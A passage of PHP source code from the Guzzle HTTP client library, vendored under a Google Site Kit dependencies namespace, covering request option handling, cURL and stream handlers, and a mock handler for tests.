$options[\Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions::HTTP_ERRORS] = \false; return $this->sendAsync($request, $options)->wait(); } /** * Create and send an asynchronous HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string $method HTTP method * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. See \GuzzleHttp\RequestOptions. */ public function requestAsync(string $method, $uri = '', array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $options = $this->prepareDefaults($options); // Remove request modifying parameter because it can be done up-front. $headers = $options['headers'] ?? []; $body = $options['body'] ?? null; $version = $options['version'] ?? '1.1'; // Merge the URI into the base URI. $uri = $this->buildUri(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::uriFor($uri), $options); if (\is_array($body)) { throw $this->invalidBody(); } $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request($method, $uri, $headers, $body, $version); // Remove the option so that they are not doubly-applied. unset($options['headers'], $options['body'], $options['version']); return $this->transfer($request, $options); } /** * Create and send an HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string $method HTTP method. * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. See \GuzzleHttp\RequestOptions. * * @throws GuzzleException */ public function request(string $method, $uri = '', array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { $options[\Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions::SYNCHRONOUS] = \true; return $this->requestAsync($method, $uri, $options)->wait(); } /** * Get a client configuration option. * * These options include default request options of the client, a "handler" * (if utilized by the concrete client), and a "base_uri" if utilized by * the concrete client. * * @param string|null $option The config option to retrieve. * * @return mixed * * @deprecated Client::getConfig will be removed in guzzlehttp/guzzle:8.0. */ public function getConfig(?string $option = null) { return $option === null ? $this->config : $this->config[$option] ?? null; } private function buildUri(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, array $config) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { if (isset($config['base_uri'])) { $uri = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UriResolver::resolve(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::uriFor($config['base_uri']), $uri); } if (isset($config['idn_conversion']) && $config['idn_conversion'] !== \false) { $idnOptions = $config['idn_conversion'] === \true ? \IDNA_DEFAULT : $config['idn_conversion']; $uri = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::idnUriConvert($uri, $idnOptions); } return $uri->getScheme() === '' && $uri->getHost() !== '' ? $uri->withScheme('http') : $uri; } /** * Configures the default options for a client. */ private function configureDefaults(array $config) : void { $defaults = ['allow_redirects' => \Google\Site_Kit_Dependencies\GuzzleHttp\RedirectMiddleware::$defaultSettings, 'http_errors' => \true, 'decode_content' => \true, 'verify' => \true, 'cookies' => \false, 'idn_conversion' => \false]; // Use the standard Linux HTTP_PROXY and HTTPS_PROXY if set. // We can only trust the HTTP_PROXY environment variable in a CLI // process due to the fact that PHP has no reliable mechanism to // get environment variables that start with "HTTP_". if (\PHP_SAPI === 'cli' && ($proxy = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::getenv('HTTP_PROXY'))) { $defaults['proxy']['http'] = $proxy; } if ($proxy = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::getenv('HTTPS_PROXY')) { $defaults['proxy']['https'] = $proxy; } if ($noProxy = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::getenv('NO_PROXY')) { $cleanedNoProxy = \str_replace(' ', '', $noProxy); $defaults['proxy']['no'] = \explode(',', $cleanedNoProxy); } $this->config = $config + $defaults; if (!empty($config['cookies']) && $config['cookies'] === \true) { $this->config['cookies'] = new \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJar(); } // Add the default user-agent header. if (!isset($this->config['headers'])) { $this->config['headers'] = ['User-Agent' => \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::defaultUserAgent()]; } else { // Add the User-Agent header if one was not already set. foreach (\array_keys($this->config['headers']) as $name) { if (\strtolower($name) === 'user-agent') { return; } } $this->config['headers']['User-Agent'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::defaultUserAgent(); } } /** * Merges default options into the array. * * @param array $options Options to modify by reference */ private function prepareDefaults(array $options) : array { $defaults = $this->config; if (!empty($defaults['headers'])) { // Default headers are only added if they are not present. $defaults['_conditional'] = $defaults['headers']; unset($defaults['headers']); } // Special handling for headers is required as they are added as // conditional headers and as headers passed to a request ctor. if (\array_key_exists('headers', $options)) { // Allows default headers to be unset. if ($options['headers'] === null) { $defaults['_conditional'] = []; unset($options['headers']); } elseif (!\is_array($options['headers'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('headers must be an array'); } } // Shallow merge defaults underneath options. $result = $options + $defaults; // Remove null values. foreach ($result as $k => $v) { if ($v === null) { unset($result[$k]); } } return $result; } /** * Transfers the given request and applies request options. * * The URI of the request is not modified and the request options are used * as-is without merging in default options. * * @param array $options See \GuzzleHttp\RequestOptions. */ private function transfer(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $request = $this->applyOptions($request, $options); /** @var HandlerStack $handler */ $handler = $options['handler']; try { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::promiseFor($handler($request, $options)); } catch (\Exception $e) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($e); } } /** * Applies the array of request options to a request. */ private function applyOptions(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array &$options) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { $modify = ['set_headers' => []]; if (isset($options['headers'])) { if (\array_keys($options['headers']) === \range(0, \count($options['headers']) - 1)) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('The headers array must have header name as keys.'); } $modify['set_headers'] = $options['headers']; unset($options['headers']); } if (isset($options['form_params'])) { if (isset($options['multipart'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('You cannot use ' . 'form_params and multipart at the same time. Use the ' . 'form_params option if you want to send application/' . 'x-www-form-urlencoded requests, and the multipart ' . 'option to send multipart/form-data requests.'); } $options['body'] = \http_build_query($options['form_params'], '', '&'); unset($options['form_params']); // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::caselessRemove(['Content-Type'], $options['_conditional']); $options['_conditional']['Content-Type'] = 'application/x-www-form-urlencoded'; } if (isset($options['multipart'])) { $options['body'] = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\MultipartStream($options['multipart']); unset($options['multipart']); } if (isset($options['json'])) { $options['body'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::jsonEncode($options['json']); unset($options['json']); // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::caselessRemove(['Content-Type'], $options['_conditional']); $options['_conditional']['Content-Type'] = 'application/json'; } if (!empty($options['decode_content']) && $options['decode_content'] !== \true) { // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::caselessRemove(['Accept-Encoding'], $options['_conditional']); $modify['set_headers']['Accept-Encoding'] = $options['decode_content']; } if (isset($options['body'])) { if (\is_array($options['body'])) { throw $this->invalidBody(); } $modify['body'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($options['body']); unset($options['body']); } if (!empty($options['auth']) && \is_array($options['auth'])) { $value = $options['auth']; $type = isset($value[2]) ? \strtolower($value[2]) : 'basic'; switch ($type) { case 'basic': // Ensure that we don't have the header in different case and set the new value. $modify['set_headers'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::caselessRemove(['Authorization'], $modify['set_headers']); $modify['set_headers']['Authorization'] = 'Basic ' . \base64_encode("{$value[0]}:{$value[1]}"); break; case 'digest': // @todo: Do not rely on curl $options['curl'][\CURLOPT_HTTPAUTH] = \CURLAUTH_DIGEST; $options['curl'][\CURLOPT_USERPWD] = "{$value[0]}:{$value[1]}"; break; case 'ntlm': $options['curl'][\CURLOPT_HTTPAUTH] = \CURLAUTH_NTLM; $options['curl'][\CURLOPT_USERPWD] = "{$value[0]}:{$value[1]}"; break; } } if (isset($options['query'])) { $value = $options['query']; if (\is_array($value)) { $value = \http_build_query($value, '', '&', \PHP_QUERY_RFC3986); } if (!\is_string($value)) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('query must be a string or array'); } $modify['query'] = $value; unset($options['query']); } // Ensure that sink is not an invalid value. if (isset($options['sink'])) { // TODO: Add more sink validation? if (\is_bool($options['sink'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('sink must not be a boolean'); } } if (isset($options['version'])) { $modify['version'] = $options['version']; } $request = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::modifyRequest($request, $modify); if ($request->getBody() instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\MultipartStream) { // Use a multipart/form-data POST if a Content-Type is not set. // Ensure that we don't have the header in different case and set the new value. $options['_conditional'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::caselessRemove(['Content-Type'], $options['_conditional']); $options['_conditional']['Content-Type'] = 'multipart/form-data; boundary=' . $request->getBody()->getBoundary(); } // Merge in conditional headers if they are not present. if (isset($options['_conditional'])) { // Build up the changes so it's in a single clone of the message. $modify = []; foreach ($options['_conditional'] as $k => $v) { if (!$request->hasHeader($k)) { $modify['set_headers'][$k] = $v; } } $request = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::modifyRequest($request, $modify); // Don't pass this internal value along to middleware/handlers. unset($options['_conditional']); } return $request; } /** * Return an InvalidArgumentException with pre-set message. */ private function invalidBody() : \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('Passing in the "body" request ' . 'option as an array to send a request is not supported. ' . 'Please use the "form_params" request option to send a ' . 'application/x-www-form-urlencoded request, or the "multipart" ' . 'request option to send a multipart/form-data request.'); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * HTTP handler that uses cURL easy handles as a transport layer. * * When using the CurlHandler, custom curl options can be specified as an * associative array of curl option constants mapping to values in the * **curl** key of the "client" key of the request. * * @final */ class CurlHandler { /** * @var CurlFactoryInterface */ private $factory; /** * Accepts an associative array of options: * * - handle_factory: Optional curl factory used to create cURL handles. * * @param array{handle_factory?: ?CurlFactoryInterface} $options Array of options to use with the handler */ public function __construct(array $options = []) { $this->factory = $options['handle_factory'] ?? new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactory(3); } public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if (isset($options['delay'])) { \usleep($options['delay'] * 1000); } $easy = $this->factory->create($request, $options); \curl_exec($easy->handle); $easy->errno = \curl_errno($easy->handle); return \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlFactory::finish($this, $easy, $this->factory); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Represents a cURL easy handle and the data it populates. * * @internal */ final class EasyHandle { /** * @var resource|\CurlHandle cURL resource */ public $handle; /** * @var StreamInterface Where data is being written */ public $sink; /** * @var array Received HTTP headers so far */ public $headers = []; /** * @var ResponseInterface|null Received response (if any) */ public $response; /** * @var RequestInterface Request being sent */ public $request; /** * @var array Request options */ public $options = []; /** * @var int cURL error number (if any) */ public $errno = 0; /** * @var \Throwable|null Exception during on_headers (if any) */ public $onHeadersException; /** * @var \Exception|null Exception during createResponse (if any) */ public $createResponseException; /** * Attach a response to the easy handle based on the received headers. * * @throws \RuntimeException if no headers have been received or the first * header line is invalid. */ public function createResponse() : void { [$ver, $status, $reason, $headers] = \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\HeaderProcessor::parseHeaders($this->headers); $normalizedKeys = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::normalizeHeaderKeys($headers); if (!empty($this->options['decode_content']) && isset($normalizedKeys['content-encoding'])) { $headers['x-encoded-content-encoding'] = $headers[$normalizedKeys['content-encoding']]; unset($headers[$normalizedKeys['content-encoding']]); if (isset($normalizedKeys['content-length'])) { $headers['x-encoded-content-length'] = $headers[$normalizedKeys['content-length']]; $bodyLength = (int) $this->sink->getSize(); if ($bodyLength) { $headers[$normalizedKeys['content-length']] = $bodyLength; } else { unset($headers[$normalizedKeys['content-length']]); } } } // Attach a response to the easy handle with the parsed headers. $this->response = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response($status, $headers, $this->sink, $ver, $reason); } /** * @param string $name * * @return void * * @throws \BadMethodCallException */ public function __get($name) { $msg = $name === 'handle' ? 'The EasyHandle has been released' : 'Invalid property: ' . $name; throw new \BadMethodCallException($msg); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\TransferStats; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Handler that returns responses or throw exceptions from a queue. * * @final */ class MockHandler implements \Countable { /** * @var array */ private $queue = []; /** * @var RequestInterface|null */ private $lastRequest; /** * @var array */ private $lastOptions = []; /** * @var callable|null */ private $onFulfilled; /** * @var callable|null */ private $onRejected; /** * Creates a new MockHandler that uses the default handler stack list of * middlewares. * * @param array|null $queue Array of responses, callables, or exceptions. * @param callable|null $onFulfilled Callback to invoke when the return value is fulfilled. * @param callable|null $onRejected Callback to invoke when the return value is rejected. */ public static function createWithMiddleware(?array $queue = null, ?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack { return \Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack::create(new self($queue, $onFulfilled, $onRejected)); } /** * The passed in value must be an array of * {@see ResponseInterface} objects, Exceptions, * callables, or Promises. * * @param array<int, mixed>|null $queue The parameters to be passed to the append function, as an indexed array. * @param callable|null $onFulfilled Callback to invoke when the return value is fulfilled. * @param callable|null $onRejected Callback to invoke when the return value is rejected. */ public function __construct(?array $queue = null, ?callable $onFulfilled = null, ?callable $onRejected = null) { $this->onFulfilled = $onFulfilled; $this->onRejected = $onRejected; if ($queue) { // array_values included for BC $this->append(...\array_values($queue)); } } public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if (!$this->queue) { throw new \OutOfBoundsException('Mock queue is empty'); } if (isset($options['delay']) && \is_numeric($options['delay'])) { \usleep((int) $options['delay'] * 1000); } $this->lastRequest = $request; $this->lastOptions = $options; $response = \array_shift($this->queue); if (isset($options['on_headers'])) { if (!\is_callable($options['on_headers'])) { throw new \InvalidArgumentException('on_headers must be callable'); } try { $options['on_headers']($response); } catch (\Exception $e) { $msg = 'An error was encountered during the on_headers event'; $response = new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException($msg, $request, $response, $e); } } if (\is_callable($response)) { $response = $response($request, $options); } $response = $response instanceof \Throwable ? \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($response) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::promiseFor($response); return $response->then(function (?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $value) use($request, $options) { $this->invokeStats($request, $options, $value); if ($this->onFulfilled) { ($this->onFulfilled)($value); } if ($value !== null && isset($options['sink'])) { $contents = (string) $value->getBody(); $sink = $options['sink']; if (\is_resource($sink)) { \fwrite($sink, $contents); } elseif (\is_string($sink)) { \file_put_contents($sink, $contents); } elseif ($sink instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface) { $sink->write($contents); } } return $value; }, function ($reason) use($request, $options) { $this->invokeStats($request, $options, null, $reason); if ($this->onRejected) { ($this->onRejected)($reason); } return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($reason); }); } /** * Adds one or more variadic requests, exceptions, callables, or promises * to the queue. * * @param mixed ...$values */ public function append(...$values) : void { foreach ($values as $value) { if ($value instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface || $value instanceof \Throwable || $value instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface || \is_callable($value)) { $this->queue[] = $value; } else { throw new \TypeError('Expected a Response, Promise, Throwable or callable. Found ' . \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::describeType($value)); } } } /** * Get the last received request. */ public function getLastRequest() : ?\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { return $this->lastRequest; } /** * Get the last received request options. */ public function getLastOptions() : array { return $this->lastOptions; } /** * Returns the number of remaining items in the queue. */ public function count() : int { return \count($this->queue); } public function reset() : void { $this->queue = []; } /** * @param mixed $reason Promise or reason. */ private function invokeStats(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, $reason = null) : void { if (isset($options['on_stats'])) { $transferTime = $options['transfer_time'] ?? 0; $stats = new \Google\Site_Kit_Dependencies\GuzzleHttp\TransferStats($request, $response, $transferTime, $reason); $options['on_stats']($stats); } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Handler; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\FulfilledPromise; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\GuzzleHttp\TransferStats; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * HTTP handler that uses PHP's HTTP stream wrapper. * * @final */ class StreamHandler { /** * @var array */ private $lastHeaders = []; /** * Sends an HTTP request. * * @param RequestInterface $request Request to send. * @param array $options Request transfer options. */ public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { // Sleep if there is a delay specified. if (isset($options['delay'])) { \usleep($options['delay'] * 1000); } $protocolVersion = $request->getProtocolVersion(); if ('1.0' !== $protocolVersion && '1.1' !== $protocolVersion) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException(\sprintf('HTTP/%s is not supported by the stream handler.', $protocolVersion), $request); } $startTime = isset($options['on_stats']) ? \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::currentTime() : null; try { // Does not support the expect header. $request = $request->withoutHeader('Expect'); // Append a content-length header if body size is zero to match // cURL's behavior. if (0 === $request->getBody()->getSize()) { $request = $request->withHeader('Content-Length', '0'); } return $this->createResponse($request, $options, $this->createStream($request, $options), $startTime); } catch (\InvalidArgumentException $e) { throw $e; } catch (\Exception $e) { // Determine if the error was a networking error. $message = $e->getMessage(); // This list can probably get more comprehensive. if (\false !== \strpos($message, 'getaddrinfo') || \false !== \strpos($message, 'Connection refused') || \false !== \strpos($message, "couldn't connect to host") || \false !== \strpos($message, 'connection attempt failed')) { $e = new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException($e->getMessage(), $request, $e); } else { $e = \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException::wrapException($request, $e); } $this->invokeStats($options, $request, $startTime, null, $e); return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($e); } } private function invokeStats(array $options, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?float $startTime, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, ?\Throwable $error = null) : void { if (isset($options['on_stats'])) { $stats = new \Google\Site_Kit_Dependencies\GuzzleHttp\TransferStats($request, $response, \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::currentTime() - $startTime, $error, []); $options['on_stats']($stats); } } /** * @param resource $stream */ private function createResponse(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, $stream, ?float $startTime) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $hdrs = $this->lastHeaders; $this->lastHeaders = []; try { [$ver, $status, $reason, $headers] = \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\HeaderProcessor::parseHeaders($hdrs); } catch (\Exception $e) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor(new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException('An error was encountered while creating the response', $request, null, $e)); } [$stream, $headers] = $this->checkDecode($options, $headers, $stream); $stream = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($stream); $sink = $stream; if (\strcasecmp('HEAD', $request->getMethod())) { $sink = $this->createSink($stream, $options); } try { $response = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response($status, $headers, $sink, $ver, $reason); } catch (\Exception $e) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor(new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException('An error was encountered while creating the response', $request, null, $e)); } if (isset($options['on_headers'])) { try { $options['on_headers']($response); } catch (\Exception $e) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor(new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException('An error was encountered during the on_headers event', $request, $response, $e)); } } // Do not drain when the request is a HEAD request because they have // no body. if ($sink !== $stream) { $this->drain($stream, $sink, $response->getHeaderLine('Content-Length')); } $this->invokeStats($options, $request, $startTime, $response, null); return new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\FulfilledPromise($response); } private function createSink(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, array $options) : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { if (!empty($options['stream'])) { return $stream; } $sink = $options['sink'] ?? \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryFopen('php://temp', 'r+'); return \is_string($sink) ? new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\LazyOpenStream($sink, 'w+') : \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($sink); } /** * @param resource $stream */ private function checkDecode(array $options, array $headers, $stream) : array { // Automatically decode responses when instructed. if (!empty($options['decode_content'])) { $normalizedKeys = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::normalizeHeaderKeys($headers); if (isset($normalizedKeys['content-encoding'])) { $encoding = $headers[$normalizedKeys['content-encoding']]; if ($encoding[0] === 'gzip' || $encoding[0] === 'deflate') { $stream = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\InflateStream(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($stream)); $headers['x-encoded-content-encoding'] = $headers[$normalizedKeys['content-encoding']]; // Remove content-encoding header unset($headers[$normalizedKeys['content-encoding']]); // Fix content-length header if (isset($normalizedKeys['content-length'])) { $headers['x-encoded-content-length'] = $headers[$normalizedKeys['content-length']]; $length = (int) $stream->getSize(); if ($length === 0) { unset($headers[$normalizedKeys['content-length']]); } else { $headers[$normalizedKeys['content-length']] = [$length]; } } } } } return [$stream, $headers]; } /** * Drains the source stream into the "sink" client option. * * @param string $contentLength Header specifying the amount of * data to read. * * @throws \RuntimeException when the sink option is invalid. */ private function drain(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $source, \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $sink, string $contentLength) : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { // If a content-length header is provided, then stop reading once // that number of bytes has been read. This can prevent infinitely // reading from a stream when dealing with servers that do not honor // Connection: Close headers. \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::copyToStream($source, $sink, \strlen($contentLength) > 0 && (int) $contentLength > 0 ? (int) $contentLength : -1); $sink->seek(0); $source->close(); return $sink; } /** * Create a resource and check to ensure it was created successfully * * @param callable $callback Callable that returns stream resource * * @return resource * * @throws \RuntimeException on error */ private function createResource(callable $callback) { $errors = []; \set_error_handler(static function ($_, $msg, $file, $line) use(&$errors) : bool { $errors[] = ['message' => $msg, 'file' => $file, 'line' => $line]; return \true; }); try { $resource = $callback(); } finally { \restore_error_handler(); } if (!$resource) { $message = 'Error creating resource: '; foreach ($errors as $err) { foreach ($err as $key => $value) { $message .= "[{$key}] {$value}" . \PHP_EOL; } } throw new \RuntimeException(\trim($message)); } return $resource; } /** * @return resource */ private function createStream(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) { static $methods; if (!$methods) { $methods = \array_flip(\get_class_methods(__CLASS__)); } if (!\in_array($request->getUri()->getScheme(), ['http', 'https'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException(\sprintf("The scheme '%s' is not supported.", $request->getUri()->getScheme()), $request); } // HTTP/1.1 streams using the PHP stream wrapper require a // Connection: close header if ($request->getProtocolVersion() === '1.1' && !$request->hasHeader('Connection')) { $request = $request->withHeader('Connection', 'close'); } // Ensure SSL is verified by default if (!isset($options['verify'])) { $options['verify'] = \true; } $params = []; $context = $this->getDefaultContext($request); if (isset($options['on_headers']) && !\is_callable($options['on_headers'])) { throw new \InvalidArgumentException('on_headers must be callable'); } if (!empty($options)) { foreach ($options as $key => $value) { $method = "add_{$key}"; if (isset($methods[$method])) { $this->{$method}($request, $context, $value, $params); } } } if (isset($options['stream_context'])) { if (!\is_array($options['stream_context'])) { throw new \InvalidArgumentException('stream_context must be an array'); } $context = \array_replace_recursive($context, $options['stream_context']); } // Microsoft NTLM authentication only supported with curl handler if (isset($options['auth'][2]) && 'ntlm' === $options['auth'][2]) { throw new \InvalidArgumentException('Microsoft NTLM authentication only supported with curl handler'); } $uri = $this->resolveHost($request, $options); $contextResource = $this->createResource(static function () use($context, $params) { return \stream_context_create($context, $params); }); return $this->createResource(function () use($uri, &$http_response_header, $contextResource, $context, $options, $request) { $resource = @\fopen((string) $uri, 'r', \false, $contextResource); $this->lastHeaders = $http_response_header ?? []; if (\false === $resource) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException(\sprintf('Connection refused for URI %s', $uri), $request, null, $context); } if (isset($options['read_timeout'])) { $readTimeout = $options['read_timeout']; $sec = (int) $readTimeout; $usec = ($readTimeout - $sec) * 100000; \stream_set_timeout($resource, $sec, $usec); } return $resource; }); } private function resolveHost(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $uri = $request->getUri(); if (isset($options['force_ip_resolve']) && !\filter_var($uri->getHost(), \FILTER_VALIDATE_IP)) { if ('v4' === $options['force_ip_resolve']) { $records = \dns_get_record($uri->getHost(), \DNS_A); if (\false === $records || !isset($records[0]['ip'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException(\sprintf("Could not resolve IPv4 address for host '%s'", $uri->getHost()), $request); } return $uri->withHost($records[0]['ip']); } if ('v6' === $options['force_ip_resolve']) { $records = \dns_get_record($uri->getHost(), \DNS_AAAA); if (\false === $records || !isset($records[0]['ipv6'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException(\sprintf("Could not resolve IPv6 address for host '%s'", $uri->getHost()), $request); } return $uri->withHost('[' . $records[0]['ipv6'] . ']'); } } return $uri; } private function getDefaultContext(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) : array { $headers = ''; foreach ($request->getHeaders() as $name => $value) { foreach ($value as $val) { $headers .= "{$name}: {$val}\r\n"; } } $context = ['http' => ['method' => $request->getMethod(), 'header' => $headers, 